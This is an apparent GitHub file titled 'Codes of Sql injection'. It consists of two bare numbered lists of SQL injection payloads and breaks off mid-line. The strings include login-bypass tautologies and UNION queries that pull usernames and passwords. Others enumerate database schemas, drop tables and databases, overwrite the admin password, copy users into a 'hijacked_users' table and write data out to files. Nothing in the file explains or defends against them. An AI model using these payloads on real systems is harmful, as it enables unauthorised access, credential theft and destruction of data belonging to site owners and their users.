-
Notifications
You must be signed in to change notification settings - Fork 0
/
Copy pathCodes of Sql injection
145 lines (93 loc) · 3.45 KB
/
Codes of Sql injection
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
1. ' OR 1=1 -- '
2. " OR 1=1 -- "
3. ') OR 1=1 -- '
4. ") OR 1=1 -- "
5. '; OR 1=1 -- '
6. ' OR 'x'='x'
7. " OR 'x'='x"
8. ') OR 'x'='x'
9. ") OR 'x'='x"
10. '; OR 'x'='x'
11. ' UNION SELECT NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL--'
12. '; DROP TABLE users --'
13. '; SELECT * FROM information_schema.tables --'
14. ' OR 1=0 LIMIT 1 -- '
15. ' OR 1=1 LIMIT 1 -- '
16. " OR 1=0 LIMIT 1 -- "
17. " OR 1=1 LIMIT 1 -- "
18. ') OR 1=0 LIMIT 1 -- '
19. ") OR 1=1 LIMIT 1 -- "
20. '; OR 1=0 LIMIT 1 -- '
21. '; OR 1=1 LIMIT 1 -- '
22. "' OR 1=0 LIMIT 1 -- "
23. "' OR 1=1 LIMIT 1 -- "
24. ' AND 1=1'
25. ' AND 1=0'
26. ' OR 2>1 -- '
27. " OR 2>1 -- "
28. ') OR 2>1 -- '
29. ") OR 2>1 -- "
30. '; OR 2>1 -- '
31. ' OR 2>2 -- '
32. " OR 2>2 -- "
33. ') OR 2>2 -- '
34. ") OR 2>2 -- "
35. '; OR 2>2 -- '
36. "' OR 2>2 -- "
37. ' AND 2>1'
38. ' AND 2>2'
39. ' OR 1=1 ORDER BY 1--'
40. ' OR 1=1 ORDER BY 2--'
41. ' OR 1=1 ORDER BY 3--'
42. ' OR 1=1 ORDER BY 4--'
43. ' OR 1=1 ORDER BY 5--'
44. ' OR 1=1 ORDER BY 6--'
45. ' OR 1=1 ORDER BY 7--'
46. ' OR 1=1 ORDER BY 8--'
47. ' OR 1=1 ORDER BY 9--'
48. ' OR 1=1 GROUP BY 1--'
49. ' OR 1=1 GROUP BY 2--'
50. ' OR 1=1 GROUP BY 3--'
1. ' OR '1'='1
2. ' OR 1=1--
3. ' OR '1'='1' #
4. ' OR 1=1#
5. ' OR '1'='1'#
6. ' OR 1=1--#
7. " or ""="
8. " or ""="" or 1=1--
9. " or 1=1--
10. ' OR 1=1;--
11. ' OR '1'='1";--
12. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a%";--
13. ' UNION SELECT null, null, null, null, null, null, null, null, null, null FROM information_schema.tables;--
14. '; SELECT * FROM users WHERE name LIKE "a%";--
15. '; SELECT * FROM users WHERE name LIKE "%a%";--
16. '; SELECT * FROM users WHERE name LIKE "%a";--
17. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a%";--
18. '; DROP TABLE users;--
19. '; DROP DATABASE dbname;--
20. '; INSERT INTO users VALUES (1, "admin", "password");--
21. ' OR 1=1 LIMIT 1;--
22. ' UNION SELECT null, null, null, null, null, null, null, null, null, null FROM information_schema.tables LIMIT 1;--
23. '; SELECT * FROM information_schema.tables WHERE table_schema = "dbname";--
24. '; SELECT * FROM information_schema.columns WHERE table_name = "users";--
25. '; SELECT name, password FROM users WHERE id = 1;--
26. ' UNION SELECT name, password FROM users WHERE name LIKE "a%";--
27. ' UNION SELECT name, password FROM users WHERE name LIKE "%a%";--
28. ' UNION SELECT name, password FROM users WHERE name LIKE "%a";--
29. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "a%";--
30. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a";--
31. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "%a%";--
32. '; SELECT * FROM users WHERE name = "admin" AND password LIKE "a";--
33. '; SELECT * FROM users WHERE name = "admin" AND password = "password";--
34. '; SELECT * FROM users WHERE name = "admin" OR 1=1;--
35. '; SELECT * FROM users WHERE id = 1 OR 1=1;--
36. ' AND 1=0 UNION SELECT name, password FROM users;--
37. ' AND 1=0 UNION SELECT name, password FROM users WHERE id = 1;--
38. '; CREATE TABLE hijacked_users (id int, name varchar(255), password varchar(255));--
39. '; INSERT INTO hijacked_users SELECT * FROM users WHERE name LIKE "a%";--
40. '; UPDATE users SET password = "newpassword" WHERE name = "admin";--
41. '; SELECT * FROM users WHERE name LIKE "a%" INTO OUTFILE "/tmp/users.txt";--
42. '; LOAD DATA INFILE "/tmp/users.txt" INTO TABLE users;--
43. '; SELECT * FROM users WHERE name